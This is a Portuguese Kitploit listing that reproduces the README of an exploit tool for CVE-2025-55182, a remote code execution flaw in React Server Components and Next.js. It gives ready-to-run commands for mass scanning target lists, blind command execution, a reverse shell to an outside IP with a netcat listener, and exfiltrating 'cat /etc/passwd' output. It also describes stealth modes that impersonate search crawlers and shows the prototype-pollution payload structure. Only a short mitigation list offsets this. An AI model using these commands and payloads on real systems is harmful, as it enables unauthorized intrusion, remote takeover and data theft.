Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 Ferramenta de Exploração de Execução Remota de Código para React Server Components | Kitploit
Ferramentas/GitHubGitHub/spritualkb/cve-2025-55182-exp
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 Ferramenta de Exploração de Execução Remota de Código para React Server Components

46128há 9 mesesRevisado pelo Kitploit
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182-exp

CVE Type Python License

🔥 Visão Geral

CVE-2025-55182 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) nos Componentes do Servidor React (RSC) que afeta aplicações Next.js que utilizam o App Router com Server Actions.

A vulnerabilidade reside no processo de desserialização do protocolo Flight, permitindo que atacantes obtenham execução arbitrária de código através de poluição de protótipo.

⚠️ Isenção de Responsabilidade / Isenção de Responsabilidade

APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta é fornecida apenas para fins educacionais e de testes de penetração autorizados. O acesso não autorizado a sistemas de computador é ilegal. Qualquer uso ilegal ou não autorizado desta ferramenta é de responsabilidade exclusiva do usuário. O autor não assume nenhuma responsabilidade.

Esta ferramenta é fornecida apenas para fins de testes de segurança autorizados e educação. Qualquer violação ou operação ilegal, todas as consequências são de responsabilidade do usuário, e não têm relação com o autor.

Por favor, leia o DISCLAIMER.md completo antes de usar esta ferramenta.

Ao usar esta ferramenta, você concorda que:

  • Você obteve a devida autorização para qualquer teste
  • Você cumprirá todas as leis e regulamentos aplicáveis
  • Você aceita total responsabilidade por suas ações
  • O autor não tem responsabilidade por qualquer uso indevido

📋 Versões Afetadas

ComponenteVersões Afetadas
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ Instalação

# Clone o repositório
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Instale as dependências
pip install requests
pip install requests[socks]  # Para suporte a proxy SOCKS5

📖 Uso

Verificar Alvo Único

python3 exploit.py http://target:3000 --check

Varredura em Lote a partir de Arquivo

# Varredura básica em lote
python3 exploit.py -f targets.txt --check

# Com modo stealth e atraso
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Salvar alvos vulneráveis em arquivo
python3 exploit.py -f targets.txt --check -o vulnerable.txt

Executar Comando (RCE Cego)

python3 exploit.py http://target:3000 -c "id"

Shell Reverso

# Inicie o listener primeiro
nc -lvnp 4444

# Execute o shell reverso
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

Exfiltrar Saída de Comando

# Inicie o listener
nc -lvnp 4444

# Execute e exfiltre a saída
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

Usando Proxy

python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 Modos Stealth

ModoDescrição
browserImita requisições reais de navegador (padrão)
crawlerImita rastreadores de mecanismos de busca (Googlebot, Baiduspider, etc.)
securityUsa User-Agents de scanners de segurança

🔧 Opções

OpçãoDescrição
targetURL do alvo (ex.: http://localhost:3000)
-f, --fileArquivo contendo URLs de alvos (um por linha)
-o, --outputArquivo de saída para alvos vulneráveis
-c, --commandComando a executar (cego)
--checkVerificar vulnerabilidade
--proxyProxy SOCKS5 (ex.: socks5://127.0.0.1:1080)
--stealthModo stealth: browser, crawler, security
--delayAtraso entre requisições em segundos
--variantsUsar múltiplas variantes de payload para verificação completa
--revshell IP PORTAShell reverso para IP:PORTA
--exfil CMD IP PORTAExecutar CMD e enviar saída via POST para IP:PORTA
-t, --timeoutTempo limite de requisição em segundos (padrão: 15)

🔬 Detalhes Técnicos

Mecanismo da Vulnerabilidade

O exploit explora a poluição de protótipo na desserialização do protocolo Flight:

  1. Poluição de Protótipo: Polui Object.prototype.then via "$1:__proto__:then"
  2. Acesso ao Construtor de Função: Define _formData.get como o construtor Function via "$1:constructor:constructor"
  3. Injeção de Código: Injeta código malicioso via _prefix que é passado para Function()

Estrutura do Payload

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<código_malicioso>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 Estrutura de Arquivos

CVE-2025-55182-exp/
├── exploit.py      # Script principal do exploit
├── targets.txt     # Lista de URLs de alvos (um por linha)
└── README.md       # Este arquivo

📝 Formato do targets.txt

# Comentários começam com #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ Mitigação

  1. Atualize para as versões corrigidas mais recentes de react-server-dom-webpack e Next.js
  2. Implemente validação de entrada nas Server Actions
  3. Use regras de Web Application Firewall (WAF) para detectar payloads maliciosos do protocolo Flight
  4. Monitore erros incomuns no servidor (HTTP 500) com mensagens relacionadas a protótipo

📜 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.


⚠️ Isenção de Responsabilidade Legal / Isenção de Responsabilidade Legal

Português

Termos de Uso

Ao baixar, copiar, instalar ou usar este software, você concorda em ficar vinculado aos termos deste aviso de isenção.

Propósito Pretendido

Esta ferramenta foi projetada exclusivamente para:

  • Testes de penetração autorizados
  • Pesquisa e educação em segurança
  • Avaliação de vulnerabilidades com autorização adequada
  • Competições CTF (Capture The Flag)
  • Ambientes de laboratório pessoal

Uso Proibido

Você NÃO DEVE usar esta ferramenta para:

  • Acesso não autorizado a sistemas de computador
  • Quaisquer atividades ilegais
  • Atacar sistemas sem permissão explícita por escrito
  • Causar danos a quaisquer sistemas ou dados
  • Quaisquer atividades que violem leis locais, estaduais, nacionais ou internacionais

Sem Garantia

ESTE SOFTWARE É FORNECIDO "COMO ESTÁ", SEM GARANTIA DE QUALQUER TIPO, EXPRESSA OU IMPLÍCITA. O(S) AUTOR(ES) ISENTAM-SE DE TODAS AS GARANTIAS, INCLUINDO MAS NÃO SE LIMITANDO A:

  • COMERCIALIZAÇÃO
  • ADEQUAÇÃO A UM PROPÓSITO ESPECÍFICO
  • NÃO VIOLAÇÃO

Limitação de Responsabilidade

Baixar ferramenta